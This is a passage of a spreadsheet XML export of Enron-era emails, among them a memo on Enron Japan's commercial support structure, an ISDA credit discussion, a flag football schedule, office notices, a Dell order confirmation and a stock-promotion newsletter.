sellers for jacking prices up to $14/MMBtu, as happened on Friday.  If that _x000D_
happens, its just another small jump to whack us for charging $1 for _x000D_
transport, or so the logic goes.  I'd like to hear preliminary views by 8:30 _x000D_
Monday am so I can talk to Mike before Stan's staff meeting (no written memo _x000D_
necessary).  Based on that prelim. research, we can decide what else need s _x000D_
to be done.  Thanks df    _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jan-erland.bekeng@enron.com'})</t>
  </si>
  <si>
    <t>Enron Japan Commercial Support Model</t>
  </si>
  <si>
    <t xml:space="preserve">Sally_x000D_
_x000D_
I just want to summarize/clarify our discussions so far on the Commercial=_x000D_
=20_x000D_
Support model for Enron Japan.=20_x000D_
_x000D_
My background:_x000D_
In Europe the Commercial Support function was divided into a Middle Office=_x000D_
=20_x000D_
(MO) and a Back Office (BO) part, with a European controller (Fearnley Dyso=_x000D_
n)=20_x000D_
responsible for both functions. For Scandinavia, the only trading office in=_x000D_
=20_x000D_
Europe outside of London, I was responsible for both functions, as Local=20_x000D_
Office controller, reporting into Barry Pearce, who reported to Fearnley. I=_x000D_
n=20_x000D_
Japan I also have this Local Office Controller function, as being responsib=_x000D_
le=20_x000D_
for MO/BO activities in this region. The MO would consist of the trading=20_x000D_
related functions: Documentation (Capture &amp; Confirmation), Risk Management,=_x000D_
=20_x000D_
Settlement and Trade Accounting. The BO would consist of G&amp;A's, Salaries &amp;=_x000D_
=20_x000D_
Wages, Tax, Management reporting, Statutory reporting and VAT.=20_x000D_
_x000D_
Back Office:_x000D_
I report directly to Cassandra Scultz (VP &amp; CAO of Enron APACHI). As much a=_x000D_
s=20_x000D_
possible are to be outsourced to our Sydney office (Heidi Mason, who also=_x000D_
=20_x000D_
reports to Cassandra), but some work has to be done in Tokyo. The reasons f=_x000D_
or=20_x000D_
this outsourcing decision is enclosed in the Power Point presentation=20_x000D_
enclosed below. For payments we use Houston Treasury, as they are the only=_x000D_
=20_x000D_
ones that can exercise a payment in the banking systems._x000D_
_x000D_
_x000D_
_x000D_
Middle Office:_x000D_
_x000D_
Mandate_x000D_
What I have in writing is a section from Joe Hirl's Memo (Request for Japan=_x000D_
=20_x000D_
Power Trading Positions (DRAFT)) to Rick Buy and Greg Whalley dated April 1=_x000D_
9=20_x000D_
this year (please find enclosed)_x000D_
_x000D_
Back Office Operations:  Jan Erland Bekeng in cooperation with Sally Beck=_x000D_
=20_x000D_
will look to establish the local risk books in Tokyo and define any=20_x000D_
system     modifications necessary given the characteristics of the Japanes=_x000D_
e=20_x000D_
electricity market.  Enron Japan will handle trade capture      and risk=20_x000D_
management while confirmations and settlements will occur in Houston under=_x000D_
=20_x000D_
Sally Beck=01,s supervision.  IT support and     system modification will b=_x000D_
e=20_x000D_
overseen by Anthony Dayao and performed in Houston._x000D_
_x000D_
_x000D_
_x000D_
Discussion -  Current &amp; Future Situation_x000D_
I see more commodities than Power. Metals will arrive September 25, Weather=_x000D_
=20_x000D_
is on the way from Sydney, and Garry Hickerson will from September 1 have a=_x000D_
=20_x000D_
guy here doing IRFX, Agri and maybe Equity.  We are also looking into Oil=_x000D_
=20_x000D_
deals, and have plans for Gas, Coal, Pulp &amp; Paper, Credit and Emissions. Al=_x000D_
so=20_x000D_
EBS is on the way. I only see Metals, IRFX and Weather as active desks this=_x000D_
=20_x000D_
year, maybe Oil. Power will take some more time to get active, due to the=_x000D_
=20_x000D_
very closed market situation here right now. On the Origination side we mig=_x000D_
ht=20_x000D_
see some structures/cross commidity/finance deals go through. Thus we have =_x000D_
a=20_x000D_
mix of activites from Enron APACHI, Enron Global Markets, EBS and Enron=20_x000D_
Metals. Basically everyone wants to do some business in Japan._x000D_
_x000D_
To coordinate all these activities we need to build the most cost efficient=_x000D_
,=20_x000D_
independent, segregated, automised and service minded Japanese Commercial=_x000D_
=20_x000D_
Support function possible. To accomplish these objectives, outsourcing to=_x000D_
=20_x000D_
Sydney is an alternative that has been discussed extensive lately, and is=_x000D_
=20_x000D_
highly recommended from our side. Labour costs in Sydney is 25% of the cost=_x000D_
s=20_x000D_
in Tokyo. Due to Sydney's experience and size they are ready to expand and=_x000D_
=20_x000D_
take on this project. They already have the segregation and independence in=_x000D_
=20_x000D_
place, and would give us an extra layer of segregation in the sense of bein=_x000D_
g=20_x000D_
an intermideary between Tokyo and Houston. Bilingual staff would be hired t=_x000D_
o=20_x000D_
perform Japanese services, which is widely available in Sydney. And there i=_x000D_
s=20_x000D_
only one hour in difference between us. Outsourcing these activities from=_x000D_
=20_x000D_
Japan to Australia is a growing trend, and many large corporations have don=_x000D_
e=20_x000D_
it this way._x000D_
_x000D_
There will be some time from the first trades until functions and commoditi=_x000D_
es=20_x000D_
are moved to Sydney. Tokyo want and needs to learn, understand all details,=_x000D_
=20_x000D_
automise, make routines and calibrate systems first. On the confirmation si=_x000D_
de=20_x000D_
our Legal department would be heavily involved in th start, compared to lat=_x000D_
er=20_x000D_
stages._x000D_
_x000D_
Proposed MO structure for Enron Japan_x000D_
_x000D_
A) Responsibility for all Commercial Support activities in Japan to be=20_x000D_
sourced to Enron Japan, under Enron Japan's CFO._x000D_
_x000D_
B) Outsource programmable tasks to Sydney:_x000D_
 - Documentation (Capture &amp; Confirmation)_x000D_
 - Settlement_x000D_
 - Trade Accounting_x000D_
_x000D_
C) Risk Management in Tokyo._x000D_
_x000D_
_x000D_
I look forward to hear from you._x000D_
_x000D_
Regards_x000D_
Jan-Erland </t>
  </si>
  <si>
    <t>Wed, 16 Feb 2000 10:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'owner-ba248d-1@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>frozenset({'e248-1@haas.berkeley.edu', 'ba248d-1@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>BA248D / E248</t>
  </si>
  <si>
    <t>Guys,_x000D_
_x000D_
One more thing: While Amir wants you to apply concepts explained in lecture_x000D_
and in the book, he does not want to receive papers with more than 5 pages._x000D_
From last semester we learned that 4 pages was often enough to cover the_x000D_
important points of the questions._x000D_
_x000D_
Good luck,_x000D_
_x000D_
Edgard A. Capdevielle_x000D_
_x000D_
MBA 2000 Candidate_x000D_
Walter A. Haas School of Business_x000D_
University of California, Berkeley_x000D_
mail: edgard@alumni.haas.org_x000D_
http://www.edgardcapdevielle.com/</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 10:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Flag Football Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 09/13/2000 05:35 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Brian Hoskins_x000D_
09/07/2000 01:04 PM_x000D_
To: Eric Bass/HOU/ECT@ECT, bthoskins@hotmail.com, Luis.Mena@enron.com, _x000D_
Amir_Ahanchian@enron.net, Matthew Lenhart/HOU/ECT@ECT, Timothy _x000D_
Blanchard/HOU/EES@EES, Bryan Hull/HOU/ECT@ECT, Jeffrey C Gossett/HOU/ECT@ECT, _x000D_
O'Neal D Winfree/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, Kenneth _x000D_
Shulklapper/HOU/ECT@ECT, Nick Hiemstra/HOU/ECT@ECT, Lenine _x000D_
Jeganathan/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Flag Football Schedule_x000D_
_x000D_
Heat,_x000D_
_x000D_
I have good news and bad news.  The bad news is that Danny Campbell, our _x000D_
esteemed Enron Flag Football President, left the company and forgot to_x000D_
tell us that our first game was...last night.  So we forfeited our first _x000D_
game.  The good news is that it was against the Raiders, and we probably _x000D_
wouldn't_x000D_
have won anyway.  _x000D_
_x000D_
Here is the schedule.  Enron's Team 3 is probably not going to play, so this _x000D_
means that we'll have some open dates unless they decide to reschedule._x000D_
Take note that we're playing in the City League again this fall, but the _x000D_
location has changed.  We're going to play at Jaycee Park.  Directions are_x000D_
below.  Sorry about the confusion this week, but I'll see you on the field _x000D_
next Wednesday night._x000D_
_x000D_
Brian_x000D_
_x000D_
_x000D_
All games are on Wednesday nights at Jaycee Park ballfield_x000D_
9/6 8:30pm vs. Raiders_x000D_
9/13 7:30pm vs. Jay Ballers_x000D_
9/20 8:30pm vs. Organized Confusion_x000D_
9/27 7:30pm vs. Dawgs (Enron)_x000D_
10/4 6:30pm vs. Team 3 (Enron)_x000D_
10/11 6:30pm vs. Raiders_x000D_
10/18 6:30pm vs. Jay Ballers_x000D_
10/25 7:30pm vs. Organized Confusion_x000D_
11/1 8:30pm vs. Dawgs (Enron)_x000D_
11/8 8:30pm vs. Team 3 (Enron)_x000D_
_x000D_
Directions to Jaycee Park ballfield (NW)_x000D_
1300 Seamist @ Grovewood_x000D_
Go out the West Loop N (610) to W. 18th Street._x000D_
Exit W. 18th Steet, go right_x000D_
Take right on Seamis, follow to the park_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Who is doing Tenn 500/800??</t>
  </si>
  <si>
    <t xml:space="preserve">No chic - business trip.  May not go because tickets are $900.  I waited _x000D_
toooooooo late doggoneit._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Veselack, Joni" &lt;joni.veselack@neg.pge.com&gt; on 05/08/2001 02:07:38 PM_x000D_
To: "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Who is doing Tenn 500/800??_x000D_
_x000D_
_x000D_
Which chick are you taking with you???_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: Tuesday, May 08, 2001 2:59 PM_x000D_
To: joni.veselack@neg.pge.com_x000D_
Subject: RE: Who is doing Tenn 500/800??_x000D_
_x000D_
_x000D_
_x000D_
We'll chat later.  I'm trying to get an invite to Florida for a CNG thingy_x000D_
next week.  Leave Wed come back Friday.  May not happen._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Veselack, Joni" &lt;joni.veselack@neg.pge.com&gt; on 05/08/2001 01:57:27 PM_x000D_
_x000D_
To:   "'Chris.Germany@enron.com'" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: Who is doing Tenn 500/800??_x000D_
_x000D_
_x000D_
Why doesn't Enron promote from within.... same old story. It just took a_x000D_
long time before EOL had the markets out there._x000D_
_x000D_
I leave Tuesday evening. There is a dinner Monday night... you should get_x000D_
an_x000D_
invite... since Goodell has to do the family thing... as always._x000D_
_x000D_
What happen to Dick??_x000D_
_x000D_
-----Original Message-----_x000D_
From: Chris.Germany@enron.com [mailto:Chris.Germany@enron.com]_x000D_
Sent: Tuesday, May 08, 2001 2:49 PM_x000D_
To: joni.veselack@neg.pge.com_x000D_
Subject: Re: Who is doing Tenn 500/800??_x000D_
_x000D_
_x000D_
_x000D_
Scott is your main man - I guess.  I don't know if he is going to keep_x000D_
doing it or if he's going to hire an analyst.  I think Susan will be doing_x000D_
Texas Eastern.  Mr. Goodell will be going to the CGAS/TCO meeting on_x000D_
Tuesday.  I may be going Tues afternoon._x000D_
_x000D_
When do you leave Houston?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Veselack, Joni" &lt;joni.veselack@neg.pge.com&gt; on 05/08/2001 08:16:56 AM_x000D_
_x000D_
To:   "'Chris Germany'" &lt;chris.germany@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Who is doing Tenn 500/800??_x000D_
_x000D_
_x000D_
Vickey told me yesterday was her last day. I see Scott Neal is on Tenn Z0._x000D_
_x000D_
There are no quotes out there... just for Enron's info._x000D_
_x000D_
I'll be in town this weekend.. going to TCO/Gulf meeting Monday and_x000D_
Tuesday._x000D_
Hope to see you._x000D_
_x000D_
Hope your back and other aches are okay._x000D_
_x000D_
_x000D_
PG&amp;E National Energy Group and any other_x000D_
company referenced herein that uses the PG&amp;E name or_x000D_
logo are not the same company as Pacific Gas and_x000D_
Electric Company, the regulated California utility.  Neither_x000D_
PG&amp;E National Energy Group nor these other_x000D_
referenced companies are regulated by the California Public_x000D_
Utilities Commission.  Customers of Pacific Gas and Electric Company_x000D_
do not have to buy products from these companies in order_x000D_
to continue to receive quality regulated services from the utility._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 21:54:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 13 Apr 2000 11:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rick.counihan@greenmountain.com', 'bdingwall@unitedgas.com', 'paulamirault@aec.ca', 'rfoss@coral-energy.com', 'bcherry@sempra.com', 'jmpa@dynegy.com', 'rochmanm@spurr.org', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'porterdk@sce.com', 'kmccrea@sablaw.com', 'burkee@cts.com', 'rmp@cpuc.ca.gov', 'alexanms@sce.com', 'craigc@calpine.com', 'jleslie@luce.com', 'tomb@crossborderenergy.com', 'jdasovic@enron.com', 'mday@gmssr.com', 'gsullivan@sempra.com', 'jfawcet@enron.com', 'douglass@arterhadden.com', 'eke@aelaw.com', 'david.bayless@utility.com'})</t>
  </si>
  <si>
    <t>TW declaration</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a draft of the Declaration of Jeffery Fawcett.  If you have _x000D_
comments, please let me know._x000D_
_x000D_
Susan Scott_x000D_
Transwestern Pipeline Company_x000D_
susan.scott@enron.com_x000D_
(713) 853-0596_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 01:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>We have arranged for John Griffith to go to Chihuahua with you. I have given _x000D_
him the El Paso rate information (there are conflicts with your spreadsheet) _x000D_
and provided the big picture overview.  I advised Agustin that there is still _x000D_
no capacity available on El Paso, therefore, we may need to purchase gas from _x000D_
an existing shipper to make this work (Burlington?)_x000D_
_x000D_
Please let me know if  you have any questions - I am in PRC meetings on _x000D_
Monday._x000D_
_x000D_
Regards,_x000D_
_x000D_
Stephanie</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 02:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Valentis/CD Holding</t>
  </si>
  <si>
    <t xml:space="preserve">thanks..._x000D_
_x000D_
_x000D_
From: Sara Shackleton@ECT on 04/23/2001 09:50 AM_x000D_
To: Caroline Abramo/Corp/Enron@Enron_x000D_
cc: Paul Radous/Enron@EnronXGate _x000D_
_x000D_
Subject: Valentis/CD Holding_x000D_
_x000D_
Caroline:_x000D_
_x000D_
I am in the midst of preparing these annexes now._x000D_
You should take special note of the credit that Paul is insisting upon (seems _x000D_
to be similar to AIG).  This is all credit - but note his Additional _x000D_
Termination Event if the ISDA is not executed within 60 days.  You must _x000D_
discuss all of the items with your counterparty._x000D_
_x000D_
Also, if you do the deal(s), give me the name, phone/fax numbers, email _x000D_
addresses of all commercial and legal for your counterparties._x000D_
_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 04/23/2001 09:45 AM -----_x000D_
_x000D_
	Paul Radous/ENRON@enronXgate_x000D_
	04/19/2001 05:43 PM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: Caroline Abramo/Corp/Enron@Enron_x000D_
		 Subject: Valentis_x000D_
_x000D_
Here are the credit worksheets for Valentis (25% of the trade and Independent _x000D_
amount should be allocated here) and CD Holdings (75% allocated here).  This _x000D_
will work for the ISDA, and I am hearing from Caroline that they are ok with _x000D_
posting this up front amount in cash.  So, for purposes of the Deemed ISDA, _x000D_
we may as well include all of the credit provisions, but make the $2MM a _x000D_
"Special Independent Amount" applicable to the counterparty, which may be _x000D_
increased by Enron up to $5MM. This Special Independent Amount should be _x000D_
added to the Independent Amount as that term is used in the ISDA in order to _x000D_
give us the ability to demand more collateral at will with respect to the _x000D_
long term hedge.  Given the fact that the c/p can post cash instead of LC's I _x000D_
see no reason for us to always have the Special Independent Amount in cash.  _x000D_
That is, if we are $2MM out of the money on the position, I do not have a _x000D_
problem returning their cash, so long as it is in increments of the rounding _x000D_
amount. _x000D_
_x000D_
So I think we should just go ahead and put credit into these Deemed ISDAs, _x000D_
and require that the failure of the parties to execute an ISDA within 60 days _x000D_
will constitute a termination event._x000D_
_x000D_
Caroline, again, the c/p will have to verbally agree to Loss instead of _x000D_
market quotation, to the special margining provisions with respect to this _x000D_
particular long term trade, etc.  Let's discuss how this will work, since it _x000D_
is different from what I proposed on the phone._x000D_
_x000D_
Sara, after you have had a chance to look at these, give me a call so we can _x000D_
discuss._x000D_
_x000D_
Thanks._x000D_
Paul_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 01:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Cabinets</t>
  </si>
  <si>
    <t>_x000D_
One 4 drawer file cabinet.  _x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas   77002-7361_x000D_
(713) 345-7732 (phone)_x000D_
(713) 646-3490 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Wed, 7 Jun 2000 09:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Time Not Out of the Office</t>
  </si>
  <si>
    <t xml:space="preserve"> I will NOT be taking Thursday, June 8, 2000 as a vacation day.   I will be _x000D_
out of the office on Friday, June 9, 2000 as a vacation day._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Becky and Taffy - please update the calendars as necessary.  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan D. Flynn_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB3806_x000D_
Houston, Texas  77002_x000D_
Phone:  713-853-0975_x000D_
Fax:  713-646-3490</t>
  </si>
  <si>
    <t>Thu, 27 Dec 2001 09:12:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'skousen@investorplace.com'})</t>
  </si>
  <si>
    <t>Turn $1,000 into $20,000</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Investor,_x000D_
_x000D_
This little biotech company just may have THE ANSWER_x000D_
to prostate cancer..._x000D_
_x000D_
...and a lock on one of the largest -- and most_x000D_
lucrative -- health markets of the Western world._x000D_
Best of all, its stock is what I call a  "Why the heck_x000D_
not" investment.  It's low-priced -- you can pick up a_x000D_
thousand shares for around $1,200 now.  And it has the_x000D_
potential to MULTIPLY that small investment 10-to-20_x000D_
TIMES over in the next couple years._x000D_
_x000D_
See why I call it "Why the heck not?"  Just a tiny_x000D_
amount of risk capital can turn into a really nice_x000D_
chunk of change._x000D_
_x000D_
Frankly, my worst expectations are for a NEAR-TERM_x000D_
DOUBLE.  That happens and you can even sell half your_x000D_
position, keep half -- and have none of your original_x000D_
investment at risk.  Everything after that is gravy!_x000D_
_x000D_
THAT'S THE BIOTECH GAME, my friend.  It's one of the_x000D_
few ways left for the average guy to get stinking_x000D_
rich.  So if you've got a little cash to spare -- and_x000D_
have a love for tape-measure home runs -- you've got_x000D_
to check this stock out._x000D_
_x000D_
Here's the story._x000D_
_x000D_
Gene sequencing and human cloning get all the_x000D_
headlines, but a lot of the most compelling work in_x000D_
biotech comes from much more "boring" fields.  This_x000D_
little company -- for example -- is doing AMAZING_x000D_
STUFF with common carbohydrate compounds.  In fact,_x000D_
its experimental drug GBC-590 may prove to be one of_x000D_
the biggest success stories of the decade._x000D_
_x000D_
LET ME STRESS the word "experimental."  It's not_x000D_
approved yet -- it's still going through clinical_x000D_
trials.  That's why the stock price is so low...but_x000D_
that's also why you have a chance to multiply your_x000D_
investment twenty fold -- if you get in now!_x000D_
_x000D_
This drug may be experimental, but it's also on the_x000D_
FAST-TRACK towards FDA-approval.  Management stepped_x000D_
up the pace of clinical studies after initial results_x000D_
proved very favorable._x000D_
_x000D_
In fact, Phase 1 results -- primarily used to show the_x000D_
safety of a drug -- showed REMARKABLE BENEFITS against_x000D_
prostate cancer.  It stabilized or reduced PSA_x000D_
(prostate specific antigen) levels in 80% of the_x000D_
patients, with advanced cancer, tested!  High PSAs, of_x000D_
course, are a marker of prostate cancer -- and a sign_x000D_
that the disease is spreading uncontrollably._x000D_
_x000D_
Today, there is no effective treatment that improves_x000D_
the survival rates for men whose cancer continues to_x000D_
spread -- even after surgery.  That's why this news is_x000D_
so important.  It means new hope for patients who_x000D_
thought they had none._x000D_
_x000D_
AND FOR INVESTORS like us, it means wealth potentially_x000D_
beyond our wildest dreams._x000D_
_x000D_
Remember, clinical trials are still ongoing.  But GBC-_x000D_
590 seems to work by attaching itself to receptor_x000D_
points on individual cells, much like the space_x000D_
shuttle docks at the orbiting space station.  Once_x000D_
"locked in," this drug thwarts the typical metastatic_x000D_
action -- that is, it stops the cancer from spreading!_x000D_
_x000D_
Imagine the wealth-building potential!  But the story_x000D_
doesn't stop there._x000D_
_x000D_
Animal-modeling with GBC-590 suggests a possible_x000D_
BREAKTHROUGH in the treatment of pancreatic cancer,_x000D_
which typically has a five-year death rate of 99%!_x000D_
43% of mice survived past the 43-day benchmark versus_x000D_
none given the most-commonly used drug for pancreatic_x000D_
cancer.  And 33% of the GBC-590 mice were 100% CURED_x000D_
of their tumors!_x000D_
_x000D_
Phase II trials on human pancreatic and colorectal_x000D_
cancer patients are now underway.  And any positive_x000D_
news here should send this stock skyrocketing._x000D_
_x000D_
WHAT'S MORE, this biotech is not some one-trick pony._x000D_
One of its more interesting developments is CAN-296, a_x000D_
new breakthrough against drug-resistant fungus,_x000D_
including Aspergillus and Candida.  Pre-clinical_x000D_
studies suggest it's very effective and extremely_x000D_
fast-acting.  Icing on the cake!_x000D_
_x000D_
I won't claim that everyone should own this stock._x000D_
It's an aggressive play, and no one should put a lot_x000D_
of money in it._x000D_
_x000D_
But then again, you don't need a lot.  Just a small_x000D_
investment now could well mushroom into a not-so-small_x000D_
FORTUNE over the next several years.  I think it's_x000D_
worth a look -- and a few thousand dollars, as well._x000D_
_x000D_
TRY A RISK-FREE trial subscription to my Forecasts &amp;_x000D_
Strategies advisory and I'll give you this company's_x000D_
name NOW -- immediately, online.  You'll also get a_x000D_
Special Introductory Report detailing all my top_x000D_
current recommendations._x000D_
_x000D_
And trust me, they're not all biotech.  I've got a_x000D_
host of stocks, funds, income vehicles and more that_x000D_
are all TOP-NOTCH investments for times like these._x000D_
_x000D_
Best of all, when I say a "risk-free subscription," I_x000D_
mean it.  Try Forecasts &amp; Strategies for six full_x000D_
months and see if I'm blowing smoke or making you_x000D_
money.  If you don't like F&amp;S -- if you're not getting_x000D_
richer -- just say, "No thanks," and your subscription_x000D_
doesn't cost you a dime._x000D_
_x000D_
That's an ironclad 6-month guarantee of total 100%_x000D_
satisfaction.  So try Forecast &amp; Strategies to see for_x000D_
yourself the advantages I bring.  Go here now:_x000D_
http://www.ppi-orders.com/index.htm?promo_code=0YN139_x000D_
_x000D_
Sincerely,_x000D_
Mark Skousen, Ph. D._x000D_
Forecasts &amp; Strategies_x000D_
_x000D_
P.S.  I think this stock will make party chatter a lot_x000D_
of fun.  Invest a thousand bucks and you could make_x000D_
enough to buy a new car.  "Why the heck not?"  Click_x000D_
here now:_x000D_
http://www.ppi-orders.com/index.htm?promo_code=0YN139_x000D_
_x000D_
------------------------------------------------------_x000D_
_x000D_
ACCOUNT MANAGEMENT_x000D_
_x000D_
We hope this free digest of investing advice is_x000D_
valuable to you. If you'd like to change your e-mail_x000D_
address (DBAUGHM@ECT.ENRON.COM), or unsubscribe, please_x000D_
do so by going to the following address:_x000D_
_x000D_
http://www.investorplace.com/unsubscribe.php_x000D_
_x000D_
Your name will be removed from our list within 7-10_x000D_
working days._x000D_
_x000D_
------------------------------------------------------_x000D_
_x000D_
Thursday Dec 27, 2001 12:12:13_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'jerome_alder@dell.com'})</t>
  </si>
  <si>
    <t>Dell online order</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; DELL &amp; ENRON ClickAtHome ORDER CONFIRMATION_x000D_
&gt;_x000D_
&gt; Thank you for your Enron ClickAtHome order!  Please read and retain this_x000D_
&gt; e-mail for your records.  It contains important information relating to_x000D_
&gt; your order that should be used in any future communications with Dell._x000D_
&gt;_x000D_
&gt; Your Dell customer number is:  12213206_x000D_
&gt;_x000D_
&gt; Your order number is:  486116486_x000D_
&gt;_x000D_
&gt; Your total "Out of Pocket" amount:  $366.79_x000D_
&gt; The total "Out of Pocket" amount includes upgrade costs, shipping and_x000D_
&gt; taxes._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Your Online Sales Point of Contact:_x000D_
&gt; We are here to assist you with your order if needed. Our office hours are_x000D_
&gt; Monday- Friday, 8am-7pm Central Standard Time.  You can reach our office_x000D_
&gt; by calling 1-866-220-3355 or through e-mail at:_x000D_
&gt; US_EPP_Clickathome@dell.com &lt;mailto:US_EPP_Clickathome@dell.com&gt; ._x000D_
&gt;_x000D_
&gt; Estimated Ship Date:_x000D_
&gt; We estimate that your order should be shipped on or before 12/29/00._x000D_
&gt; Although we do not anticipate a delay in your order, we cannot guarantee_x000D_
&gt; the shipping date as we occasionally run into unexpected delays in_x000D_
&gt; manufacturing.  Your order is being shipped to you under Dell's terms and_x000D_
&gt; conditions of sale found at: www.dell.com &lt;http://www.dell.com&gt;._x000D_
&gt;_x000D_
&gt; Total Satisfaction Policy:_x000D_
&gt; If you wish to cancel your order for any reason within 30 days, we'll_x000D_
&gt; refund amounts paid by you, minus shipping costs, no questions asked.  You_x000D_
&gt; are responsible for the cost of shipping your system back to us._x000D_
&gt;_x000D_
&gt; How to Check Order Status:_x000D_
&gt; If you would like to check the status of your order, please call Dell's_x000D_
&gt; automated order status inquiry system at:  1-800-433-9014, or visit Dell's_x000D_
&gt; Order Status Page at: &lt;http://wwwapp.us.dell.com/us/en/ordstat/index.asp&gt;._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; You can also register to have Dell e-mail you when your order is shipped,_x000D_
&gt; by going to:_x000D_
&gt; &lt;http://wwwapp.us.dell.com/us/en/ordstat/watchreg.asp?ordnum&gt;._x000D_
&gt;_x000D_
&gt; How to reach a Technical Support Representative:_x000D_
&gt; Once you have received your equipment, if you need to contact a Dell_x000D_
&gt; technical support representative, please call 1-866-220-3355, option 3._x000D_
&gt; You will be asked to give your "Service Tag Number".  The "Service Tag_x000D_
&gt; Number" is a five digit alphanumeric number written on the white bar code_x000D_
&gt; label on the back of the system.  Please have this number ready before you_x000D_
&gt; contact the technical support representative._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Thank you for participating in the Dell/ Enron ClickAtHome program.  It is_x000D_
&gt; my pleasure to work with you._x000D_
&gt;_x000D_
&gt; Sincerely,_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Jerome Alder_x000D_
&gt; Dell Sales Rep._x000D_
&gt; EPP_x000D_
&gt; 1-695-8133_x000D_
&gt; Ext. 49761_x000D_
&gt; Email:Jerome_Alder@Dell.com_x000D_
&gt;_x000D_
&gt; </t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 04:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Conference call Availability w/ Harry??</t>
  </si>
  <si>
    <t xml:space="preserve">Please include Sue on the call-in info. Thanks._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Joseph Alamo_x000D_
	04/23/2001 11:31 AM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron_x000D_
		 cc: _x000D_
		 Subject: Conference call Availability w/ Harry??_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
Jeff - _x000D_
_x000D_
Rubena called to see if you'd be available today for a conference call _x000D_
w/Harry Kingerski re: SCE PX Credit_x000D_
at 2:30 our time/4:30 central._x000D_
_x000D_
Please so advise me your availability -- or preferable time, if need be?? -- _x000D_
ASAP._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Joseph_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 09:48:27 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dale.onrait@rbc.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi Jonathan, _x000D_
Our compliance department has just contacted us back regarding your request to hold a small cash account here to pay your RSP fees each year.  Their suggestion is that we sell the Janus mutual funds and convert this money to US funds then transfer it to your Dane Rascher account in the US because you are now a US resident and the Investment regulations want it handled that way._x000D_
You could simply send us a cheque for the RSP fees when we notify you each June. _x000D_
I hope you had a good holiday season, did you get home for Christmas?  Let me know by phone if we can proceed as suggested above and I will look after it for you in the new year.  Thanks._x000D_
Dale Onrait, BSP MBA _x000D_
RBC Investments-Kelowna _x000D_
1-800-756-2211 or (250) 712-2191 </t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 08:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Calpine Power Services, Inc.</t>
  </si>
  <si>
